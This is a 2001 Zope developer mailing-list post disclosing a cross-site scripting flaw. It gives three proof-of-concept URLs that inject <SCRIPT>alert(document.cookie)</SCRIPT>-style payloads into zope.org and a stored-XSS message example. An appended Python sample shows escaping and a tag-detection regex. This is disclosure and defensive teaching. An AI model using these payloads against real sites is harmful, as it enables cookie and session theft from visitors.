[Zope-dev] New: Cross Site Scripting vulnerability

"ALife ALife" <buginfo@inbox.ru>
Sun, 23 Sep 2001 17:23:32 +0000 (GMT)


Example:

http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>

For example, an attacker might post a message like

        Hello message board. This is a message.
               <SCRIPT>malicious code</SCRIPT>
        This is the end of my message.

When a victim with scripts enabled in their browser reads this
message, the malicious code may be executed unexpectedly.
Scripting tags that can be embedded in this way include <SCRIPT>,
<OBJECT>, <APPLET>, and <EMBED>.
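
The following is an added example, not part of the original post and not Zope's own code: it contrasts echoing request data into HTML unescaped with encoding it at output time, using the URLs and message quoted above. It assumes the server reflects the requested path into an error page (the post does not show the response); all function names are hypothetical.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# The four tags the post names as embeddable.
ACTIVE_TAGS = re.compile(r"<\s*(script|object|applet|embed)\b", re.IGNORECASE)

# Request URLs quoted in the post, plus one constructed percent-encoded variant.
SAMPLE_URLS = [
    "http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>",
    "http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>",
    "http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>",
    "http://www.zope.org/%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E",
]

# Message-board text quoted in the post.
SAMPLE_POST = (
    "Hello message board. This is a message.\n"
    "<SCRIPT>malicious code</SCRIPT>\n"
    "This is the end of my message."
)

def requested_path(url):
    """Path as the application sees it after URL-decoding."""
    return unquote(urlsplit(url).path)

def not_found_unsafe(path):
    # Vulnerable pattern (assumed): request data concatenated into HTML as-is.
    return "<html><body><h1>Not Found</h1><p>" + path + "</p></body></html>"

def not_found_safe(path):
    # Hardened: encode for the HTML context at output time.
    return ("<html><body><h1>Not Found</h1><p>"
            + html.escape(path, quote=True) + "</p></body></html>")

def render_post_safe(body):
    # Same rule for stored content such as a message-board post.
    return '<div class="post"><pre>' + html.escape(body, quote=True) + "</pre></div>"

def has_active_tag(markup):
    """True if the markup still contains one of the tags named in the post."""
    return bool(ACTIVE_TAGS.search(markup))

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        p = requested_path(url)
        print(has_active_tag(not_found_unsafe(p)), has_active_tag(not_found_safe(p)))
    print(render_post_safe(SAMPLE_POST))
```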